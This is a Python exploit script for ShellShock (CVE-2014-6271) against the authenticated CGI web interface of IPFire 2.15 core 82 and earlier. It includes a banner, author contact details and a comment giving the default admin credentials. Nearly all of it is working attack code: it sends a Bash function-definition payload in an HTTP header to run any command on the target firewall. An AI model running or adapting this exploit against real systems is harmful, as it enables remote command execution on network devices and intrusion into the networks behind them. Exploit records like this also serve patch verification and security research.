#!/usr/bin/env python
#
# Exploit Title : IPFire <= 2.15 core 82 Authenticated cgi Remote Command Injection (ShellShock)
#
# Exploit Author : Claudio Viviani
#
# Vendor Homepage : http://www.ipfire.org
#
# Software Link: http://downloads.ipfire.org/releases/ipfire-2.x/2.15-core82/ipfire-2.15.i586-full-core82.iso
#
# Date : 2014-09-29
#
# Fixed version: IPFire 2.15 core 83 (2014-09-28)
#
# Info: IPFire is a free Linux distribution which acts as a router and firewall in the first instance.
# It can be maintained via a web interface.
# The distribution furthermore offers selected server-daemons and can easily be expanded to a SOHO-server.
# IPFire is based on Linux From Scratch and is, like the Endian Firewall, originally a fork from IPCop.
#
# Vulnerability: IPFire <= 2.15 core 82 Cgi Web Interface suffers from Authenticated Bash Environment Variable Code Injection
# (CVE-2014-6271)
#
# Suggestion:
#
# If you can't update the distro and you have installed ipfire via image files (Arm, Flash)
# make sure to change the default access permission to graphical user interface (user:admin pass:ipfire)
#
#
# http connection
import urllib2
# Basic Auth management Base64
import base64
# Args management
import optparse
# Error management
import sys
banner = """
___ _______ _______ __ _______ __
| | _ | _ |__.----.-----. | _ .-----|__|
|. |. 1 |. 1___| | _| -__| |. 1___| _ | |
|. |. ____|. __) |__|__| |_____| |. |___|___ |__|
|: |: | |: | |: 1 |_____|
|::.|::.| |::.| |::.. . |
`---`---' `---' `-------'
_______ __ __ __ _______ __ __
| _ | |--.-----| | | _ | |--.-----.----| |--.
| 1___| | -__| | | 1___| | _ | __| <
|____ |__|__|_____|__|__|____ |__|__|_____|____|__|__|
|: 1 | |: 1 |
|::.. . | |::.. . |
`-------' `-------'
IPFire <= 2.15 c0re 82 Authenticated
Cgi Sh3llSh0ck r3m0t3 C0mm4nd Inj3ct10n
Written by:
Claudio Viviani
info@homelab.it
homelabit@protonmail.ch
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
"""
# Check url
def checkurl(url):
if url[:8] != "https://" and url[:7] != "http://":
print('[X] You must insert http:// or https:// procotol')
sys.exit(1)
else:
return url
def connectionScan(url,user,pwd,cmd):
print '[+] Connection in progress...'
try:
response = urllib2.Request(url)
content = urllib2.urlopen(response)
print '[X] IPFire Basic Authentication not found'
except urllib2.HTTPError, e:
if e.code == 404:
print '[X] Page not found'
elif e.code == 401:
try:
print '[+] Authentication in progress...'
base64string = base64.encodestring('%s:%s' % (user, pwd)).replace('\n', '')
headers = {'VULN' : '() { :;}; echo "H0m3l4b1t"; /bin/bash -c "'+cmd+'"' }
response = urllib2.Request(url, None, headers)
response.add_header("Authorization", "Basic %s" % base64string)
content = urllib2.urlopen(response).read()
if "ipfire" in content:
print '[+] Username & Password: OK'
print '[+] Checking for vulnerability...'
if 'H0m3l4b1t' in content:
print '[!] Command "'+cmd+'": INJECTED!'
else:
print '[X] Not Vulnerable :('
else:
print '[X] No IPFire page found'
except urllib2.HTTPError, e:
if e.code == 401:
print '[X] Wrong username or password'
else:
print '[X] HTTP Error: '+str(e.code)
except urllib2.URLError:
print '[X] Connection Error'
else:
print '[X] HTTP Error: '+str(e.code)
except urllib2.URLError:
print '[X] Connection Error'
commandList = optparse.OptionParser('usage: %prog -t https://target:444/ -u admin -p pwd -c "touch /tmp/test.txt"')
commandList.add_option('-t', '--target', action="store",
help="Insert TARGET URL",
)
commandList.add_option('-c', '--cmd', action="store",
help="Insert command name",
)
commandList.add_option('-u', '--user', action="store",
help="Insert username",
)
commandList.add_option('-p', '--pwd', action="store",
help="Insert password",
)
options, remainder = commandList.parse_args()
# Check args
if not options.target or not options.cmd or not options.user or not options.pwd:
print(banner)
commandList.print_help()
sys.exit(1)
print(banner)
url = checkurl(options.target)
cmd = options.cmd
user = options.user
pwd = options.pwd
connectionScan(url,user,pwd,cmd)